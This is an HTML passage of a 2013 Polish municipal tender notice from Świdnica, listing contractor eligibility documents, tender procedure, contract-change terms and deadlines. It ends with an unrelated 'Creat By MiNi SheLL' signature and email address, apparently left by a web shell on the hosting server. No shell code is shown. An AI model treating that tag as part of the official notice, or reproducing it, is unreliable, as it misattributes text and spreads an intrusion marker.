<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- zaparafowany projekt umowy - zał. nr 10 do oferty, wg wzoru zał. nr 8 do SIWZ,
- dowód wniesienia wadium - zał. nr 11 do oferty,
- wykaz części zamówienia w przypadku gdy realizację Wykonawca zamierza powierzyć podwykonawcom -zał. nr 9 do oferty, wg wzoru nr    załącznik nr 6 do SIWZ,
- pełnomocnictwo do działania w imieniu Wykonawcy w przypadku, gdy nie jest to osoba upoważniona do reprezentowania Wykonawcy z mocy prawa - zał. nr 12 do oferty,
- w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, zgodnie z art. 23 ust. 2 Ustawy - zał. nr 13 do oferty,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>20.1 Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego 
na takich warunkach jak umowa, której projekt stanowi zał. nr 8 do SIWZ. 
20.2 Zamawiający przewiduje zmiany umowy w formie pisemnej - aneksem zaakceptowanym przez obie strony w następujących przypadkach jeżeli zmiana umowy jest korzystna dla Zamawiającego (korzyść ekonomiczna, techniczna, eksploatacyjna),
a. jeżeli wystąpiły okoliczności, których przy dołożeniu należytej staranności strony na dzień podpisania umowy przewidzieć nie mogły, a wynikają one ze zmian przepisów prawa, które nastąpiły w czasie realizacji zamówienia,.
b. Wykonawca może dokonać zmian osób, pełniących funkcje kierownicze na budowie z zachowaniem właściwych kwalifikacji zawodowych.
20.3 Zmiany w umowie mogą być dopuszczone wyłącznie pod warunkiem złożenia wniosku przez Wykonawcę i po akceptacji Zamawiającego. 
20.4 W  przypadku odstąpienia przez Wykonawcę od obowiązku ubezpieczenia  w trakcie trwania umowy Zamawiającemu przysługuje prawo do wypowiedzenia umowy z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.swidnica.bip-gov.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2013 godzina 09:00, miejsce: Urząd Miejski w Świdnicy, ul. Armii Krajowej 49, 58-100 Świdnica, Miejskie Biuro Przetargów, pok. 124, I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com